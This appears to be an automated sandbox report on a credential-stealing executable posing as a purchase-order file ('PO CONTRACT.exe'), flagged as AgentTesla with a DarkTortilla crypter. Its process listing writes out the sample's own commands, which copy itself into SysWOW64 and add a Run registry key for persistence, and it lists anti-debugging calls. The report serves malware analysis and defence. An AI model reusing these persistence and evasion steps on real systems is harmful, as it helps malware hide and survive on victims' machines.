add byte ptr [eax], al (repeated 97 times in the original listing: the bytes following the jmp stub decode as zero-byte padding)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24f970 | 0x4b | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x250000 | 0x3e4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x252000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x24d9c4 | 0x24da00 | acefc9d9a0d1714802bfc80ed090b6f8 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x250000 | 0x3e4 | 0x400 | 4d20dda505fe83dde0e0103488936fb8 | False | 0.4267578125 | data | 3.413996474439628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x252000 | 0xc | 0x200 | ae3fe773ece0b7c6137213b44fbc3c07 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        Name        RVA       Size   Type                                                              Language  Country  ZLIB Complexity
                                        RT_VERSION  0x250058  0x38c  PGP symmetric key encrypted data - Plaintext or unencrypted data                     0.44823788546255505
                                        DLL          Import
                                        mscoree.dll  _CorExeMain
                                        No network behavior found

                                        Target ID:0
                                        Start time:23:10:01
                                        Start date:14/08/2024
                                        Path:C:\Users\user\Desktop\PO CONTRACT.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\PO CONTRACT.exe"
                                        Imagebase:0x7e0000
                                        File size:2'417'152 bytes
                                        MD5 hash:E9E7439B7D1098424BFC0BC877B7B2C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.36008654605.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.36008654605.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.36008654605.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.36005874246.0000000003F38000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.36005874246.0000000003F38000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.36005874246.0000000003F38000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.36008654605.0000000005747000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.36008654605.0000000005747000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.36008654605.0000000005747000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.36011026094.0000000006900000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.36000430187.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 00000000.00000002.36008654605.00000000059D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        Target ID:2
                                        Start time:23:10:04
                                        Start date:14/08/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"cmd" /c ping 127.0.0.1 -n 36 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe"
                                        Imagebase:0xfb0000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:3
                                        Start time:23:10:04
                                        Start date:14/08/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6a66e0000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:4
                                        Start time:23:10:04
                                        Start date:14/08/2024
                                        Path:C:\Windows\SysWOW64\PING.EXE
                                        Wow64 process (32bit):true
                                        Commandline:ping 127.0.0.1 -n 36
                                        Imagebase:0x40000
                                        File size:18'944 bytes
                                        MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:5
                                        Start time:23:10:34
                                        Start date:14/08/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"cmd" /c ping 127.0.0.1 -n 43 > nul && copy "C:\Users\user\Desktop\PO CONTRACT.exe" "C:\Windows\SysWOW64\SOA.exe" && ping 127.0.0.1 -n 43 > nul && "C:\Windows\SysWOW64\SOA.exe"
                                        Imagebase:0xfb0000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:6
                                        Start time:23:10:34
                                        Start date:14/08/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6a66e0000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:7
                                        Start time:23:10:34
                                        Start date:14/08/2024
                                        Path:C:\Windows\SysWOW64\PING.EXE
                                        Wow64 process (32bit):true
                                        Commandline:ping 127.0.0.1 -n 43
                                        Imagebase:0x40000
                                        File size:18'944 bytes
                                        MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:8
                                        Start time:23:10:39
                                        Start date:14/08/2024
                                        Path:C:\Windows\SysWOW64\reg.exe
                                        Wow64 process (32bit):true
                                        Commandline:REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "SOA" /t REG_SZ /d "C:\Windows\SysWOW64\SOA.exe"
                                        Imagebase:0x3a0000
                                        File size:59'392 bytes
                                        MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:9
                                        Start time:23:11:15
                                        Start date:14/08/2024
                                        Path:C:\Windows\SysWOW64\PING.EXE
                                        Wow64 process (32bit):true
                                        Commandline:ping 127.0.0.1 -n 43
                                        Imagebase:0x40000
                                        File size:18'944 bytes
                                        MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:10
                                        Start time:23:11:56
                                        Start date:14/08/2024
                                        Path:C:\Windows\SysWOW64\SOA.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\SysWOW64\SOA.exe"
                                        Imagebase:0xc80000
                                        File size:2'417'152 bytes
                                        MD5 hash:E9E7439B7D1098424BFC0BC877B7B2C2
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.37465940778.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.37465940778.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000A.00000002.37465940778.00000000056D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.37462492550.0000000003F0F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.37462492550.0000000003F0F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000A.00000002.37462492550.0000000003F0F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_DarkTortilla, Description: Yara detected DarkTortilla Crypter, Source: 0000000A.00000002.37452537402.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 47%, ReversingLabs
                                        • Detection: 57%, Virustotal
                                        Reputation:low
                                        Has exited:true

                                        Target ID:11
                                        Start time:23:12:29
                                        Start date:14/08/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                        Imagebase:0xd00000
                                        File size:42'064 bytes
                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.40714268783.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.40714268783.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.40717853751.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Has exited:false

                                        Target ID:13
                                        Start time:23:13:14
                                        Start date:14/08/2024
                                        Path:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
                                        Imagebase:0x450000
                                        File size:42'064 bytes
                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Antivirus matches:
                                        • Detection: 0%, ReversingLabs
                                        • Detection: 0%, Virustotal
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:14
                                        Start time:23:13:14
                                        Start date:14/08/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6a66e0000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:15
                                        Start time:23:13:22
                                        Start date:14/08/2024
                                        Path:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
                                        Imagebase:0x340000
                                        File size:42'064 bytes
                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:16
                                        Start time:23:13:22
                                        Start date:14/08/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6a66e0000
                                        File size:875'008 bytes
                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                          Execution Graph

                                          Execution Coverage:16%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:8.8%
                                          Total number of Nodes:68
                                          Total number of Limit Nodes:1
                                          execution_graph 62738 545df84 62739 545df92 62738->62739 62740 545df42 62738->62740 62744 545df70 62740->62744 62747 545df5f 62740->62747 62741 545df58 62745 545df81 62744->62745 62751 545f3a0 62744->62751 62745->62741 62748 545df70 62747->62748 62749 545df81 62748->62749 62750 545f3a0 2 API calls 62748->62750 62749->62741 62750->62749 62755 545f3c0 62751->62755 62759 545f3d0 62751->62759 62752 545f3ba 62752->62745 62756 545f412 62755->62756 62758 545f419 62755->62758 62757 545f46a CallWindowProcW 62756->62757 62756->62758 62757->62758 62758->62752 62760 545f412 62759->62760 62762 545f419 62759->62762 62761 545f46a CallWindowProcW 62760->62761 62760->62762 62761->62762 62762->62752 62773 5452ae0 62774 5452af2 62773->62774 62779 5453070 62774->62779 62782 545304a 62774->62782 62785 54531f0 62774->62785 62789 54531f8 62774->62789 62780 54530b4 CheckRemoteDebuggerPresent 62779->62780 62781 54530f6 62780->62781 62781->62774 62783 54530b4 CheckRemoteDebuggerPresent 62782->62783 62784 54530f6 62783->62784 62784->62774 62786 54531f8 OutputDebugStringW 62785->62786 62788 5453277 62786->62788 62788->62774 62790 545323e OutputDebugStringW 62789->62790 62792 5453277 62790->62792 62792->62774 62763 8ff7db8 62764 8ff7f43 62763->62764 62765 8ff7dde 62763->62765 62765->62764 62768 8ff8038 PostMessageW 62765->62768 62770 8ff8036 62765->62770 62769 8ff80a4 62768->62769 62769->62765 62771 8ff8038 PostMessageW 62770->62771 62772 8ff80a4 62771->62772 62772->62765 62793 97209d8 62794 9720a02 62793->62794 62798 9727a18 62794->62798 62803 9727a08 62794->62803 62795 9726173 62799 9727a41 62798->62799 62808 9727ce0 62799->62808 62812 9727c7d 62799->62812 62800 9727b24 62800->62795 62804 9727a41 62803->62804 62805 9727ce0 2 API calls 62804->62805 62806 9727c7d 2 API calls 62804->62806 62807 9727b24 62805->62807 62806->62807 62807->62795 62809 9727cf6 62808->62809 62816 97283e0 62809->62816 62813 9727c8e 62812->62813 62815 97283e0 2 API calls 
62813->62815 62814 9727fca 62814->62800 62815->62814 62817 97283f5 62816->62817 62821 97286d8 62817->62821 62825 972869f 62817->62825 62818 9727fca 62818->62800 62822 972871e DeleteFileW 62821->62822 62824 9728757 62822->62824 62824->62818 62826 97286ac DeleteFileW 62825->62826 62828 9728757 62826->62828 62828->62818

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 8f50a94-8f50d08 30 8f50d0e-8f51a35 0->30 31 8f52c7b-8f52f60 0->31 438 8f51d07-8f52c73 30->438 439 8f51a3b-8f51cff 30->439 106 8f53ec7-8f54ec0 31->106 107 8f52f66-8f53ebf 31->107 672 8f551b6-8f551c9 106->672 673 8f54ec6-8f551ae 106->673 107->106 438->31 439->438 677 8f55830-8f567a8 672->677 678 8f551cf-8f55828 672->678 673->672 1062 8f567a8 call 8f57c40 677->1062 1063 8f567a8 call 8f57c30 677->1063 1064 8f567a8 call 8f57bfb 677->1064 678->677 1061 8f567ae-8f567b5 1062->1061 1063->1061 1064->1061
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 575e67d32d79d35671d2c4f21dfea47bf532d23d99056d082110c182f157d773
                                          • Instruction ID: a1adb634abd6e3a389ecd61d84b35f53ad08ae134e4621ef2768f879a7492e2b
                                          • Opcode Fuzzy Hash: 575e67d32d79d35671d2c4f21dfea47bf532d23d99056d082110c182f157d773
                                          • Instruction Fuzzy Hash: A8B32971A012288FCB98FF79D9992ADBBF2FB89200F4085E9D448A7354DB345D95CF81

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1065 8f50ab8-8f50d08 1094 8f50d0e-8f51a35 1065->1094 1095 8f52c7b-8f52f60 1065->1095 1502 8f51d07-8f52c73 1094->1502 1503 8f51a3b-8f51cff 1094->1503 1170 8f53ec7-8f54ec0 1095->1170 1171 8f52f66-8f53ebf 1095->1171 1736 8f551b6-8f551c9 1170->1736 1737 8f54ec6-8f551ae 1170->1737 1171->1170 1502->1095 1503->1502 1741 8f55830-8f567a8 1736->1741 1742 8f551cf-8f55828 1736->1742 1737->1736 2126 8f567a8 call 8f57c40 1741->2126 2127 8f567a8 call 8f57c30 1741->2127 2128 8f567a8 call 8f57bfb 1741->2128 1742->1741 2125 8f567ae-8f567b5 2126->2125 2127->2125 2128->2125
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015224746.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8f50000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6430cdc80ba289746669f78e7bfc3a1f98294490b8af6738aa29b31d873161de
                                          • Instruction ID: 93a5b08429b21d4ee0e84e0ee5fae35a4e1089e9d9ee36c919f8fb16857ae796
                                          • Opcode Fuzzy Hash: 6430cdc80ba289746669f78e7bfc3a1f98294490b8af6738aa29b31d873161de
                                          • Instruction Fuzzy Hash: 9CB31971A112288FCB98FF79D9992ADBBF2FB88200F4085E9D448A7354DB345D95CF81

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 3083 97209d8-9720bf3 4034 9720bf5 call 972725b 3083->4034 4035 9720bf5 call 9727268 3083->4035 3108 9720bfb-972616b 4032 972616d call 9727a18 3108->4032 4033 972616d call 9727a08 3108->4033 4031 9726173-972617a 4032->4031 4033->4031 4034->3108 4035->3108
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36016020124.0000000009720000.00000040.00000800.00020000.00000000.sdmp, Offset: 09720000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_9720000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c0c69173e52923f3cedf55411ec20836a614eb10c296ebded8a905c2aa4c5cc4
                                          • Instruction ID: e79e847f4d4db1010636570b73dbb2ff92ea4b0f79c24be00537959adefde8a5
                                          • Opcode Fuzzy Hash: c0c69173e52923f3cedf55411ec20836a614eb10c296ebded8a905c2aa4c5cc4
                                          • Instruction Fuzzy Hash: 33B3FA71A112198FCB58BF79E99966DBBF2FB84300F4085EAD488A3250DF345E95CF81

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 4036 5453ea0-5457635 4614 5457645-54576e9 4036->4614 4615 5457637-5457640 call 5453cc0 4036->4615 4625 54576ef-545770e 4614->4625 4626 545788a-5457942 4614->4626 4615->4614 4630 5457714-54577c3 4625->4630 4631 54577ca-5457884 4625->4631 4651 5457e9e-545801b 4626->4651 4652 5457948-5457a25 4626->4652 4630->4631 4631->4625 4631->4626 4651->4614 4675 5457db2-5457e98 4652->4675 4676 5457a2b-5457b08 call 5453cd0 4652->4676 4675->4651 4675->4652 4712 5457b77-5457c14 4676->4712 4713 5457b0a-5457b2b 4676->4713 4732 5457c17-5457c19 4712->4732 4713->4712 4722 5457b2d-5457b4e call 5453cd0 4713->4722 4722->4712 4731 5457b50-5457b5d 4722->4731 4737 5457b64-5457b71 4731->4737 4734 5457d03-5457dac 4732->4734 4735 5457c1f-5457c2a call 5453cc0 4732->4735 4734->4675 4734->4676 4735->4734 4737->4712 4737->4732
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36007616340.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5450000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b27462ff6578cfee4b686880d0578621ae61e4c77e6b5e57ab3b91c86e02a0e0
                                          • Instruction ID: 2e7435ac21494f8701ac4b47b651fcd67f6d0f15bbdab2e4536970e1f16cd80e
                                          • Opcode Fuzzy Hash: b27462ff6578cfee4b686880d0578621ae61e4c77e6b5e57ab3b91c86e02a0e0
                                          • Instruction Fuzzy Hash: 5B733A70A15628CBCB58EFB8EC897ADBBB5FB48200F5085E9E448A3244DF346D94CF55

                                          Control-flow Graph (graph image not reproduced; node entries are address ranges, edges are a->b, legend: Executed / Not Executed)
                                          control_flow_graph 4747 8ff4066-8ff4072 4748 8ff4073-8ff407c 4747->4748 4749 8ff437e-8ff43d4 4748->4749 4750 8ff407d-8ff4099 4748->4750 4753 8ff43d6-8ff43e2 call 8ff449b 4749->4753 4754 8ff4402-8ff4414 4749->4754 4755 8ff409f 4750->4755 4756 8ff426d-8ff4340 4750->4756 4763 8ff43e4-8ff43ed 4753->4763 4758 8ff4417-8ff441d 4754->4758 4759 8ff40a6-8ff4250 4755->4759 4812 8ff4379 4756->4812 4813 8ff4342-8ff4353 4756->4813 4764 8ff441e-8ff4428 4758->4764 4759->4756 4845 8ff4252-8ff425a 4759->4845 4763->4763 4766 8ff43ef-8ff43ff 4763->4766 4767 8ff442a-8ff442c 4764->4767 4766->4754 4769 8ff445e-8ff446c 4767->4769 4770 8ff442e-8ff443b 4767->4770 4771 8ff446d-8ff447e 4769->4771 4773 8ff443d 4770->4773 4774 8ff4480-8ff457d 4770->4774 4771->4774 4773->4767 4776 8ff443f-8ff4454 4773->4776 4808 8ff457f-8ff458a 4774->4808 4809 8ff4591-8ff4926 4774->4809 4776->4771 4777 8ff4456-8ff445c 4776->4777 4777->4769 4808->4809 4883 8ff492c-8ff6d7b 4809->4883 4884 8ff76d7-8ff76dc 4809->4884 4812->4749 4813->4748 4816 8ff4359-8ff436a call 8ff6d7c 4813->4816 4826 8ff4371-8ff4378 4816->4826 4845->4756 4883->4884 4887 8ff76dd-8ff76e9 4884->4887 4887->4887 4889 8ff76eb-8ff770e 4887->4889 4890 8ff7750-8ff777e 4889->4890 4891 8ff7710-8ff773b 4889->4891 4893 8ff77c0-8ff77d2 4890->4893 4894 8ff7780-8ff779e 4890->4894 4891->4890 4895 8ff77e0-8ff7805 4893->4895 4894->4895 4898 8ff77a0-8ff77b2 4894->4898 4900 8ff77b4-8ff77bd 4898->4900 4900->4900 4901 8ff77bf 4900->4901 4901->4893
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36015389486.0000000008FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_8ff0000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 08a517fd6965ad8a5dd9c8685cfa987d5c575e6060afdf7106b94c8ec8a1b5cc
                                          • Instruction ID: be91bda77d159e431d29c8f6ba4077fee99fa70f2295d82377dc205ec842642a
                                          • Opcode Fuzzy Hash: 08a517fd6965ad8a5dd9c8685cfa987d5c575e6060afdf7106b94c8ec8a1b5cc
                                          • Instruction Fuzzy Hash: FA438CB0A15218CBCB54FFB8D9886ADBBB1EF88300F4185E9D548A3351DF385D94CBA5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.35999952513.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d60000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b929124243ecedeb6a66a4db3ccd248f66f23f52dd348d577d2630c90222132a
                                          • Instruction ID: 977898547f2e97f431af0b4a4a01d4be25f88b966df85cf47e7154f77db30823
                                          • Opcode Fuzzy Hash: b929124243ecedeb6a66a4db3ccd248f66f23f52dd348d577d2630c90222132a
                                          • Instruction Fuzzy Hash: 54130974A18226DBCB54DFF8D884BADB3B5BB48304F508A95D90DE3344DB38AE90CB55

                                          Control-flow Graph (graph image not reproduced; node entries are address ranges, edges are a->b, legend: Executed / Not Executed)
                                          control_flow_graph 5980 5453070-54530f4 CheckRemoteDebuggerPresent 5982 54530f6-54530fc 5980->5982 5983 54530fd-5453138 5980->5983 5982->5983
                                          APIs
                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 054530E7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.36007616340.0000000005450000.00000040.00000800.00020000.00000000.sdmp, Offset: 05450000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_5450000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID: CheckDebuggerPresentRemote
                                          • String ID:
                                          • API String ID: 3662101638-0
                                          • Opcode ID: 0de3bacf0260c71f4cf1eb44fe5a4a24ebd1d0c5279cac086905e592d94d4de2
                                          • Instruction ID: 931877e44a079c98e4405059011cd0ab35a3461ecfb1029bf1ae5dda2a2ce53c
                                          • Opcode Fuzzy Hash: 0de3bacf0260c71f4cf1eb44fe5a4a24ebd1d0c5279cac086905e592d94d4de2
                                          • Instruction Fuzzy Hash: 782114B18002598FCB10CF9AD884BEEFBF4AF49320F14845AE859B3351D778A944CFA1
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.35999952513.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d60000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 72b99dfdeed79dd491637c7b4616846e84ba21f54262349b3abf288f4343b5a3
                                          • Instruction ID: ec46704b3b41653a43262f58645fa7eb09760548ce8755c2cc6ba5ec90b786b6
                                          • Opcode Fuzzy Hash: 72b99dfdeed79dd491637c7b4616846e84ba21f54262349b3abf288f4343b5a3
                                          • Instruction Fuzzy Hash: 69923834A00249DFCB25CF68D588AAEBBF2FF89314F158559E8469B3A5D730ED41CB60
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.35999952513.0000000002D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D60000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_2d60000_PO CONTRACT.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f63283c26da3c5284f596aa32cd24abb1cfa00e0d1e6169b37c40a1f359e0007
